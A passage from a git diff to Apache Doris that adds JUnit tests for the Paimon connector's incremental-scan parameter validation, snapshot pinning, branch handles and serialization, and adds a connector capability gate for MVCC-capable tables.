ids (legacy line 738-742; here only start + scanMode, no end). MUTATION: + // allowing scanMode with a half-open range -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate( + params("startSnapshotId", "1", "incrementalBetweenScanMode", "diff")), + "incrementalBetweenScanMode requires both start and end snapshot ids"); + Assertions.assertTrue(ex.getMessage().contains( + "incrementalBetweenScanMode can only be specified when"), + "the scanMode-needs-both error must match the legacy message"); + } + + @Test + public void timestampGroupRequiresStart() { + // WHY: same start-required rule for the timestamp group (legacy line 793-794); only endTimestamp + // is invalid. MUTATION: not requiring startTimestamp -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("endTimestamp", "200")), + "timestamp-based incremental read must require startTimestamp"); + Assertions.assertTrue(ex.getMessage().contains( + "startTimestamp is required when using timestamp-based incremental read"), + "the missing-start-timestamp error must match the legacy message"); + } + + @Test + public void onlyStartSnapshotIdRequiresEnd() { + // WHY: a snapshot-based window with start but no end is rejected (legacy line 847-849) — the + // snapshot path has no Long.MAX_VALUE open-ended fallback (unlike timestamps). MUTATION: + // silently allowing only-start -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("startSnapshotId", "1")), + "snapshot-based incremental read with only start must require end"); + Assertions.assertTrue(ex.getMessage().contains( + "endSnapshotId is required when using snapshot-based incremental read"), + "the missing-end error must match the legacy message"); + } + + // ==================== numeric range rules ==================== + + @Test + public void snapshotIdsMustBeNonNegative() { + // WHY: snapshot ids are >= 0 (legacy line 748). MUTATION: dropping the >=0 check -> no throw. + Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("startSnapshotId", "-1", "endSnapshotId", "2")), + "a negative startSnapshotId must be rejected"); + } + + @Test + public void startSnapshotIdMustNotExceedEnd() { + // WHY: a window must run forward: startSId <= endSId (legacy line 772). MUTATION: dropping the + // ordering check -> an inverted window is accepted -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("startSnapshotId", "5", "endSnapshotId", "2")), + "startSnapshotId must be <= endSnapshotId"); + Assertions.assertTrue(ex.getMessage().contains( + "startSnapshotId must be less than or equal to endSnapshotId"), + "the snapshot-ordering error must match the legacy message"); + } + + @Test + public void endTimestampMustBePositive() { + // WHY: endTimestamp must be > 0 (strictly positive, legacy line 812 uses <= 0), distinct from + // startTimestamp's >= 0. MUTATION: weakening to >= 0 -> endTimestamp=0 accepted -> no throw red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("startTimestamp", "0", "endTimestamp", "0")), + "endTimestamp must be strictly greater than 0"); + Assertions.assertTrue(ex.getMessage().contains("endTimestamp must be greater than 0"), + "the endTimestamp-positive error must match the legacy message"); + } + + @Test + public void startTimestampMustBeLessThanEnd() { + // WHY: timestamp window must run forward: startTS < endTS (STRICT, legacy line 825 uses >=). + // MUTATION: weakening to <= -> equal timestamps accepted -> no throw -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate(params("startTimestamp", "200", "endTimestamp", "200")), + "startTimestamp must be strictly less than endTimestamp"); + Assertions.assertTrue(ex.getMessage().contains("startTimestamp must be less than endTimestamp"), + "the timestamp-ordering error must match the legacy message"); + } + + // ==================== scanMode enum + original-case gotcha ==================== + + @Test + public void scanModeRejectsUnknownValue() { + // WHY: scanMode is a closed enum {auto,diff,delta,changelog} (legacy line 783-785). MUTATION: + // dropping the enum check -> a bogus mode reaches the SDK -> no throw here -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonIncrementalScanParams.validate( + params("startSnapshotId", "1", "endSnapshotId", "2", "incrementalBetweenScanMode", "bogus")), + "an unknown incrementalBetweenScanMode must be rejected"); + Assertions.assertTrue(ex.getMessage().contains( + "incrementalBetweenScanMode must be one of: auto, diff, delta, changelog"), + "the scanMode-enum error must match the legacy message"); + } + + @Test + public void scanModeValidatedCaseInsensitivelyButEmittedOriginalCase() { + // WHY (parity gotcha): legacy validates the scan mode LOWERCASED (line 782) but emits the + // ORIGINAL-CASE value (line 859-860 puts params.get(...) verbatim, not the lowercased copy). So + // "DELTA" passes validation AND is emitted as "DELTA" (not "delta"). MUTATION: emitting the + // lowercased copy -> value == "delta" -> red; failing to accept upper-case at all -> throw red. + Map out = PaimonIncrementalScanParams.validate( + params("startSnapshotId", "1", "endSnapshotId", "2", "incrementalBetweenScanMode", "DELTA")); + Assertions.assertEquals("DELTA", out.get("incremental-between-scan-mode"), + "scanMode must be validated case-insensitively but emitted in its ORIGINAL case"); + } + + // ==================== produced-map shape ==================== + + @Test + public void bothSnapshotIdsProduceIncrementalBetween() { + // WHY: a [start,end] snapshot window emits incremental-between=start,end (legacy line 854). + // MUTATION: wrong separator/order -> value != "1,5" -> red. + Map out = PaimonIncrementalScanParams.validate( + params("startSnapshotId", "1", "endSnapshotId", "5")); + Assertions.assertEquals("1,5", out.get("incremental-between"), + "both snapshot ids must emit incremental-between=start,end"); + } + + @Test + public void onlyStartTimestampUsesLongMaxAsOpenEnd() { + // WHY: a timestamp window with only a start is OPEN-ENDED -> start,Long.MAX_VALUE (legacy line + // 870). MUTATION: using a different open-end sentinel (e.g. -1 or 0) -> value mismatch -> red. + Map out = PaimonIncrementalScanParams.validate(params("startTimestamp", "100")); + Assertions.assertEquals("100," + Long.MAX_VALUE, out.get("incremental-between-timestamp"), + "only-start timestamp must emit start,Long.MAX_VALUE (open-ended)"); + } + + @Test + public void bothTimestampsProduceIncrementalBetweenTimestamp() { + // WHY: a [start,end] timestamp window emits incremental-between-timestamp=start,end (legacy + // line 873). MUTATION: wrong key/value -> red. + Map out = PaimonIncrementalScanParams.validate( + params("startTimestamp", "100", "endTimestamp", "200")); + Assertions.assertEquals("100,200", out.get("incremental-between-timestamp"), + "both timestamps must emit incremental-between-timestamp=start,end"); + } + + @Test + public void nullResetKeysAreStrippedNotPresentWithNull() { + // WHY (the documented benign divergence): legacy SEEDS scan.snapshot-id=null and scan.mode=null + // (lines 842-843/846) as defensive resets against an inherited base Table. The connector loads a + // FRESH Table per query (nothing to reset) and ConnectorMvccSnapshot rejects null values, so the + // port STRIPS these — they must be ABSENT, not present-with-null. Stripping is byte-parity in + // EFFECT on a freshly-loaded base. MUTATION: re-seeding the null keys -> containsKey true -> red. + Map out = PaimonIncrementalScanParams.validate( + params("startSnapshotId", "1", "endSnapshotId", "5")); + Assertions.assertFalse(out.containsKey("scan.snapshot-id"), + "the legacy null scan.snapshot-id reset must be STRIPPED (absent), not present-with-null"); + Assertions.assertFalse(out.containsKey("scan.mode"), + "the legacy null scan.mode reset must be STRIPPED (absent), not present-with-null"); + Assertions.assertFalse(out.containsValue(null), + "the produced option map must contain NO null values (ConnectorMvccSnapshot rejects them)"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 83547fe8f67a86..dfa5dae39768e2 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -162,6 +162,63 @@ public void nonForcedSplitWithoutNativeFilesTakesJni() { "a split without convertible raw files must route to JNI regardless of forceJni"); } + @Test + public void resolveScanTableAppliesSnapshotPinViaCopy() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable base = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + // The pinned (copied) table is a DISTINCT instance so we can prove the scan uses the COPY, + // not the un-pinned base. + FakePaimonTable pinned = new FakePaimonTable( + "t1@5", rowType("id"), Collections.emptyList(), Collections.emptyList()); + base.copyResult = pinned; + + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(base); + // A snapshot-pinned handle: applySnapshot would have produced exactly this scanOptions map. + PaimonTableHandle pinnedHandle = handle.withScanOptions( + Collections.singletonMap("scan.snapshot-id", "5")); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Table scanTable = provider.resolveScanTable(pinnedHandle); + + // WHY: a snapshot-pinned handle must read at the pinned version on BOTH the planned-splits + // and the JNI serialized-table paths. The scan provider applies the pin by layering the + // handle's scanOptions onto the resolved table via Table.copy(scanOptions). MUTATION: + // skipping the copy (using the un-pinned resolveTable result) -> scanTable is `base`, not + // `pinned`, and lastCopyOptions stays null -> red; passing the wrong options -> the + // scan.snapshot-id assertion below -> red. + Assertions.assertSame(pinned, scanTable, + "the scan path must use the snapshot-pinned (copied) table, not the un-pinned base"); + Assertions.assertEquals(Collections.singletonMap("scan.snapshot-id", "5"), + base.lastCopyOptions, + "the scan path must layer the handle's scanOptions via Table.copy(scanOptions)"); + } + + @Test + public void resolveScanTableWithoutScanOptionsDoesNotCopy() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable base = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + // A normal (un-pinned) handle: empty scanOptions. + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(base); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Table scanTable = provider.resolveScanTable(handle); + + // WHY: a normal read must NOT call Table.copy at all — copying with empty options is wasted + // work and, more importantly, the un-pinned path must return the resolved table verbatim. + // MUTATION: unconditionally calling copy(scanOptions) -> lastCopyOptions becomes non-null + // (and FakePaimonTable.copy would be hit) -> red. + Assertions.assertSame(base, scanTable, + "an un-pinned handle must return the resolved table without a copy"); + Assertions.assertNull(base.lastCopyOptions, + "an un-pinned handle must NOT invoke Table.copy"); + } + @Test public void resolveTableUsesTransientWithoutReload() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableHandleScanOptionsTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableHandleScanOptionsTest.java new file mode 100644 index 00000000000000..2db34bc31b08af --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableHandleScanOptionsTest.java @@ -0,0 +1,329 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorTableSchema; + +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; + +/** + * Tests for the B5a scan-pin / partition-key-flip wiring on {@link PaimonTableHandle} and + * {@link PaimonConnectorMetadata#getTableSchema}: the serializable {@code scanOptions} field, the + * {@link PaimonTableHandle#withScanOptions(Map)} copy factory (identity-preserving, equals/hashCode + * ignoring scanOptions), the Java-serialization survival of scanOptions, and the {@code + * partition_columns} key flip the generic fe-core consumer reads. + */ +public class PaimonTableHandleScanOptionsTest { + + private static RowType rowType(String... columnNames) { + RowType.Builder builder = RowType.builder(); + for (String name : columnNames) { + builder.field(name, DataTypes.INT()); + } + return builder.build(); + } + + @Test + public void normalHandleHasEmptyScanOptions() { + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + + // WHY: a normal (un-pinned) handle must default to empty scanOptions so the scan path takes + // the no-copy fast path. MUTATION: defaulting to null -> NPE downstream / non-empty -> the + // un-pinned path would wrongly call Table.copy -> red. + Assertions.assertTrue(handle.getScanOptions().isEmpty(), + "a normal handle must carry empty scanOptions"); + } + + @Test + public void withScanOptionsPreservesIdentityAndSetsOptions() { + PaimonTableHandle base = new PaimonTableHandle( + "db1", "t1", + Arrays.asList("dt", "region"), + Collections.singletonList("id")); + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + base.setPaimonTable(table); + + Map opts = Collections.singletonMap("scan.snapshot-id", "9"); + PaimonTableHandle pinned = base.withScanOptions(opts); + + // WHY: withScanOptions is a copy factory — the pinned handle is the SAME table, just read at + // a version, so every identity field AND the transient Table must carry over unchanged while + // only scanOptions is set. MUTATION: dropping any preserved field (e.g. partitionKeys) or + // not setting scanOptions -> the matching assertion -> red. + Assertions.assertEquals("db1", pinned.getDatabaseName()); + Assertions.assertEquals("t1", pinned.getTableName()); + Assertions.assertEquals(Arrays.asList("dt", "region"), pinned.getPartitionKeys(), + "withScanOptions must preserve partitionKeys"); + Assertions.assertEquals(Collections.singletonList("id"), pinned.getPrimaryKeys(), + "withScanOptions must preserve primaryKeys"); + Assertions.assertNull(pinned.getSysTableName(), + "withScanOptions must preserve sysTableName (null for a normal handle)"); + Assertions.assertFalse(pinned.isForceJni(), + "withScanOptions must preserve forceJni"); + Assertions.assertSame(table, pinned.getPaimonTable(), + "withScanOptions must carry over the transient Table"); + Assertions.assertEquals(opts, pinned.getScanOptions(), + "withScanOptions must set the given scanOptions"); + } + + @Test + public void withScanOptionsPreservesSysIdentity() { + PaimonTableHandle sys = PaimonTableHandle.forSystemTable("db1", "t1", "binlog", true); + + PaimonTableHandle pinned = sys.withScanOptions( + Collections.singletonMap("scan.snapshot-id", "9")); + + // WHY: the copy must preserve the sys identity (sysTableName + forceJni) too — a later + // dispatch may route through withScanOptions on any handle, and silently dropping the sys + // identity would turn a sys handle into a base handle (wrong rows). MUTATION: omitting + // sysTableName/forceJni from the copy ctor -> these assertions -> red. + Assertions.assertTrue(pinned.isSystemTable(), + "withScanOptions must preserve sys-table identity"); + Assertions.assertEquals("binlog", pinned.getSysTableName()); + Assertions.assertTrue(pinned.isForceJni(), + "withScanOptions must preserve the forceJni hint"); + } + + @Test + public void equalsAndHashCodeIgnoreScanOptions() { + PaimonTableHandle base = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle pinned = base.withScanOptions( + Collections.singletonMap("scan.snapshot-id", "5")); + + // WHY: a snapshot-pinned handle is the SAME table read at a version, so it MUST equal/hash + // identically to its base — otherwise plan/cache keying would treat the pinned read as a + // different table. scanOptions therefore must NOT participate in equals/hashCode. MUTATION: + // including scanOptions in equals/hashCode -> base.equals(pinned) false / hashes differ -> + // red. + Assertions.assertEquals(base, pinned, + "a snapshot-pinned handle must equal its base handle (scanOptions ignored in equals)"); + Assertions.assertEquals(base.hashCode(), pinned.hashCode(), + "scanOptions must not affect hashCode"); + } + + @Test + public void scanOptionsSurviveJavaSerializationRoundTrip() throws Exception { + PaimonTableHandle original = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()) + .withScanOptions(Collections.singletonMap("scan.snapshot-id", "7")); + + // Real Java serialization round-trip (the FE/BE / plan-reuse wire mechanism). + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + try (ObjectOutputStream oos = new ObjectOutputStream(baos)) { + oos.writeObject(original); + } + PaimonTableHandle restored; + try (ObjectInputStream ois = new ObjectInputStream( + new ByteArrayInputStream(baos.toByteArray()))) { + restored = (PaimonTableHandle) ois.readObject(); + } + + // WHY: the JNI serialized-table read happens on a DESERIALIZED handle (the transient Table + // is dropped and reloaded on BE/plan-reuse), so the snapshot pin must survive serialization + // — otherwise the pinned read would silently fall back to the latest version (wrong rows for + // time-travel). scanOptions must therefore be non-transient. MUTATION: marking scanOptions + // transient -> restored.getScanOptions() empty -> red. + Assertions.assertEquals("7", restored.getScanOptions().get("scan.snapshot-id"), + "scanOptions must survive serialization (non-transient) so the pinned read is preserved"); + } + + // ==================== B5b-2c: branch identity ==================== + + @Test + public void withBranchSetsBranchNameAndDoesNotCarryTransientTable() { + PaimonTableHandle base = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + base.setPaimonTable(table); + + PaimonTableHandle branched = base.withBranch("b1"); + + // WHY: a branch handle must record its branch name and stay a non-system handle. + Assertions.assertEquals("b1", branched.getBranchName(), + "withBranch must set the branch name"); + Assertions.assertFalse(branched.isSystemTable(), + "a branch handle is NOT a system handle"); + // CRITICAL TRAP: unlike withScanOptions, withBranch must NOT carry the transient base Table + // over — a branch is a DIFFERENT table (independent schema/snapshots). Carrying the base + // Table would make resolveTable return the base table's rows for the branch read (silent data + // error). MUTATION: copying this.paimonTable into the branch handle -> getPaimonTable() != null + // -> red, so resolveTable is forced to reload the BRANCH table via the 3-arg branch Identifier. + Assertions.assertNull(branched.getPaimonTable(), + "withBranch must NOT carry the transient base Table (forces a branch reload)"); + // toString must render the branch suffix ("@b1") so logs / explains distinguish a branch read + // from its base. MUTATION: dropping the branch suffix from toString -> the contains check red. + Assertions.assertTrue(branched.toString().contains("@b1"), + "a branch handle's toString must render the '@' suffix"); + } + + @Test + public void withBranchPreservesOtherFields() { + PaimonTableHandle base = new PaimonTableHandle( + "db1", "t1", + Arrays.asList("dt", "region"), + Collections.singletonList("id")) + .withScanOptions(Collections.singletonMap("scan.snapshot-id", "9")); + + PaimonTableHandle branched = base.withBranch("b1"); + + // WHY: withBranch is a copy factory that changes ONLY branchName — every other field + // (db/table/partitionKeys/primaryKeys/scanOptions) must carry over unchanged. MUTATION: + // dropping any preserved field -> the matching assertion -> red. + Assertions.assertEquals("db1", branched.getDatabaseName()); + Assertions.assertEquals("t1", branched.getTableName()); + Assertions.assertEquals(Arrays.asList("dt", "region"), branched.getPartitionKeys(), + "withBranch must preserve partitionKeys"); + Assertions.assertEquals(Collections.singletonList("id"), branched.getPrimaryKeys(), + "withBranch must preserve primaryKeys"); + Assertions.assertEquals("9", branched.getScanOptions().get("scan.snapshot-id"), + "withBranch must preserve scanOptions"); + } + + @Test + public void branchIsPartOfHandleIdentity() { + PaimonTableHandle base = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle b1 = base.withBranch("b1"); + PaimonTableHandle b2 = base.withBranch("b2"); + + // WHY: a branch handle is a DIFFERENT table identity than its base and than another branch + // (independent schema/snapshots), exactly like sysTableName — so branchName MUST participate + // in equals/hashCode, otherwise plan/cache keying would conflate the base read with the + // branch read (wrong rows). MUTATION: leaving branchName out of equals/hashCode -> base + // equals b1 (and b1 equals b2) -> these assertions red. + Assertions.assertNotEquals(base, b1, + "a branch handle must NOT equal its base handle"); + Assertions.assertNotEquals(b1, b2, + "two different branch handles must NOT be equal"); + Assertions.assertEquals(b1, base.withBranch("b1"), + "two handles on the same branch must be equal"); + Assertions.assertEquals(b1.hashCode(), base.withBranch("b1").hashCode(), + "two handles on the same branch must have equal hashCodes"); + } + + @Test + public void scanOptionsStillIgnoredInIdentityForBranchHandle() { + PaimonTableHandle b1 = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()).withBranch("b1"); + PaimonTableHandle b1Pinned = b1.withScanOptions( + Collections.singletonMap("scan.snapshot-id", "5")); + + // WHY: scanOptions remain excluded from identity even for a branch handle — a branch read + // pinned at a version is the SAME branch table, just read at a version. MUTATION: including + // scanOptions in equals/hashCode -> these assertions red. + Assertions.assertEquals(b1, b1Pinned, + "a branch handle with vs without scanOptions must be equal (scanOptions excluded)"); + Assertions.assertEquals(b1.hashCode(), b1Pinned.hashCode(), + "scanOptions must not affect a branch handle's hashCode"); + } + + @Test + public void sysIdentityUnaffectedByBranchField() { + PaimonTableHandle base = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + PaimonTableHandle sys = PaimonTableHandle.forSystemTable("db1", "t1", "snapshots", false); + + // WHY: adding branchName to identity must not regress the existing sys identity invariant — + // a base handle (branch=null, sys=null) still must NOT equal a sys handle (branch=null, + // sys=snapshots). MUTATION: a botched equals (e.g. comparing only branchName) -> red. + Assertions.assertNotEquals(base, sys, + "a base handle must still NOT equal a sys handle after adding branchName"); + Assertions.assertNull(sys.getBranchName(), + "forSystemTable must default branchName to null"); + } + + @Test + public void branchHandleSurvivesJavaSerializationWithTransientTableNull() throws Exception { + PaimonTableHandle original = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()) + .withBranch("b1"); + + // Real Java serialization round-trip (the FE/BE / plan-reuse wire mechanism). branchName is + // non-transient and must survive so the deserialized handle still reloads the BRANCH table. + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + try (ObjectOutputStream oos = new ObjectOutputStream(baos)) { + oos.writeObject(original); + } + PaimonTableHandle restored; + try (ObjectInputStream ois = new ObjectInputStream( + new ByteArrayInputStream(baos.toByteArray()))) { + restored = (PaimonTableHandle) ois.readObject(); + } + + // WHY: a deserialized branch handle (transient Table dropped on the BE/plan-reuse boundary) + // must still know it is a branch so resolveTable reloads the BRANCH table via the 3-arg branch + // Identifier — otherwise the read would silently fall back to the base table (wrong rows). + // MUTATION: marking branchName transient -> restored.getBranchName() null -> red. + Assertions.assertEquals("b1", restored.getBranchName(), + "branchName must survive serialization (non-transient) so the branch reload is preserved"); + Assertions.assertNull(restored.getPaimonTable(), + "the transient Table must be null after deserialize (reloaded as the branch table)"); + } + + @Test + public void getTableSchemaEmitsPartitionColumnsKeyForPartitionedHandle() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", rowType("id", "dt", "region"), + Arrays.asList("dt", "region"), + Collections.emptyList()); + ops.table = table; + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", + Arrays.asList("dt", "region"), + Collections.emptyList()); + handle.setPaimonTable(table); + + ConnectorTableSchema schema = new PaimonConnectorMetadata( + ops, Collections.emptyMap(), new RecordingConnectorContext()) + .getTableSchema(null, handle); + Map props = schema.getProperties(); + + // WHY: the generic fe-core consumer PluginDrivenExternalTable.initSchema reads the schema + // property "partition_columns" (not "partition_keys") to learn a table is partitioned; + // keying it under "partition_keys" left the FE treating paimon as non-partitioned. MUTATION: + // emitting the old "partition_keys" key -> "partition_columns" absent + "partition_keys" + // present -> both assertions red. + Assertions.assertEquals("dt,region", props.get("partition_columns"), + "getTableSchema must emit partition keys under the 'partition_columns' key"); + Assertions.assertNull(props.get("partition_keys"), + "the legacy 'partition_keys' key must no longer be emitted (FE reads partition_columns)"); + + // Sanity: columns still resolved (the schema build itself is unaffected by the key flip). + List columns = schema.getColumns(); + Assertions.assertEquals(3, columns.size(), + "all columns must still be mapped from the row type"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java index 6dd8e30c4d7087..51c89537b12e7f 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java @@ -56,6 +56,13 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { * base and sys lookups. */ Table sysTable; + /** + * Optional override returned by {@link #getTable} when the requested Identifier denotes a real + * (non-main, non-sys) branch (3-arg branch Identifier). When set, a branch load returns a + * DIFFERENT table double than the base {@link #table}, so a branch read can be proven to operate + * on the branch's own schema/snapshots. When unset, {@link #table} is returned. + */ + Table branchTable; boolean throwDatabaseNotExist; boolean throwTableNotExist; @@ -86,6 +93,28 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { boolean snapshotExists; /** The table the metadata layer passed to the most recent MVCC seam call. */ Table lastMvccTable; + /** The timestamp (millis) the metadata layer passed to the most recent snapshotIdAtOrBefore. */ + long snapshotIdAtOrBeforeArg; + + // ---- B5b-2a explicit time-travel seam: configurable results + call capture ---- + /** schemaId returned by snapshotSchemaId (default empty => stamps -1). */ + OptionalLong snapshotSchemaId = OptionalLong.empty(); + /** tag resolution returned by getSnapshotByTag (default null => empty => not found). */ + PaimonCatalogOps.TagSnapshot tagSnapshot; + /** schema returned by schemaAt (set per-test to drive the at-schemaId column mapping). */ + PaimonCatalogOps.PaimonSchemaSnapshot schemaAt; + /** The arguments the metadata layer passed to the most recent time-travel seam call. */ + long lastSnapshotSchemaIdArg; + String lastTagNameArg; + long lastSchemaAtArg; + + // ---- B5b-2c branch time-travel seam: configurable result + call capture ---- + /** Whether the configured branch is reported to exist by {@link #branchExists}. */ + boolean branchExists; + /** The branch name the metadata layer passed to the most recent {@link #branchExists} call. */ + String lastBranchExistsArg; + /** The base table the metadata layer passed to the most recent {@link #branchExists} call. */ + Table lastBranchExistsTable; @Override public List listDatabases() { @@ -125,6 +154,15 @@ public Table getTable(Identifier identifier) throws Catalog.TableNotExistExcepti if (sysTable != null && identifier.getSystemTableName() != null) { return sysTable; } + // A 3-arg branch Identifier carries a non-"main" branch and no system-table name; serve + // branchTable when set so a branch load returns a DIFFERENT table double than the base. + // getBranchNameOrDefault() returns "main" for a base/sys identifier and the real branch name + // for a 3-arg branch identifier — robustly distinguishing the branch load. + if (branchTable != null + && identifier.getSystemTableName() == null + && !"main".equals(identifier.getBranchNameOrDefault())) { + return branchTable; + } return table; } @@ -198,6 +236,7 @@ public OptionalLong latestSnapshotId(Table table) { public OptionalLong snapshotIdAtOrBefore(Table table, long timestampMillis) { log.add("snapshotIdAtOrBefore:" + timestampMillis); lastMvccTable = table; + snapshotIdAtOrBeforeArg = timestampMillis; return snapshotIdAtOrBefore; } @@ -208,6 +247,41 @@ public boolean snapshotExists(Table table, long snapshotId) { return snapshotExists; } + @Override + public OptionalLong snapshotSchemaId(Table table, long snapshotId) { + log.add("snapshotSchemaId:" + snapshotId); + lastMvccTable = table; + lastSnapshotSchemaIdArg = snapshotId; + return snapshotSchemaId; + } + + @Override + public java.util.Optional getSnapshotByTag(Table table, String tagName) { + log.add("getSnapshotByTag:" + tagName); + lastMvccTable = table; + lastTagNameArg = tagName; + return java.util.Optional.ofNullable(tagSnapshot); + } + + @Override + public PaimonCatalogOps.PaimonSchemaSnapshot schemaAt(Table table, long schemaId) { + log.add("schemaAt:" + schemaId); + lastMvccTable = table; + lastSchemaAtArg = schemaId; + return schemaAt; + } + + @Override + public boolean branchExists(Table table, String branchName) { + log.add("branchExists:" + branchName); + // Capture which table validation ran against (must be the BASE table, mirroring legacy + // resolvePaimonBranch which validates the branch on the base table's branchManager). + // Kept in a DEDICATED field so lastMvccTable stays a pure MVCC-seam artifact. + lastBranchExistsTable = table; + lastBranchExistsArg = branchName; + return branchExists; + } + @Override public void close() { log.add("close"); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalDatabase.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalDatabase.java index 83581fef8529b6..acc94b3f06ed44 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalDatabase.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalDatabase.java @@ -17,6 +17,9 @@ package org.apache.doris.datasource; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorCapability; + /** * Generic {@link ExternalDatabase} for plugin-driven catalogs. * @@ -38,6 +41,19 @@ public PluginDrivenExternalDatabase(ExternalCatalog extCatalog, long id, @Override protected PluginDrivenExternalTable buildTableInternal(String remoteTableName, String localTableName, long tblId, ExternalCatalog catalog, ExternalDatabase db) { + // Capability gate: connectors that expose a point-in-time snapshot (e.g. Paimon) declare + // SUPPORTS_MVCC_SNAPSHOT and get the MVCC/MTMV-capable subclass. The plain plugin connectors + // (jdbc/es/max_compute/trino-connector) do NOT declare it and keep the base class, which has + // no MTMV/MvccTable behavior. getConnector() forces init (makeSureInitialized) and returns the + // built connector; the null check is a defensive fallback to the base class for a not-yet-built + // or failed connector (post-init it is normally non-null — initLocalObjectsImpl throws on null). + if (catalog instanceof PluginDrivenExternalCatalog) { + Connector connector = ((PluginDrivenExternalCatalog) catalog).getConnector(); + if (connector != null + && connector.getCapabilities().contains(ConnectorCapability.SUPPORTS_MVCC_SNAPSHOT)) { + return new PluginDrivenMvccExternalTable(tblId, localTableName, remoteTableName, catalog, db); + } + } return new PluginDrivenExternalTable(tblId, localTableName, remoteTableName, catalog, db); } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java index 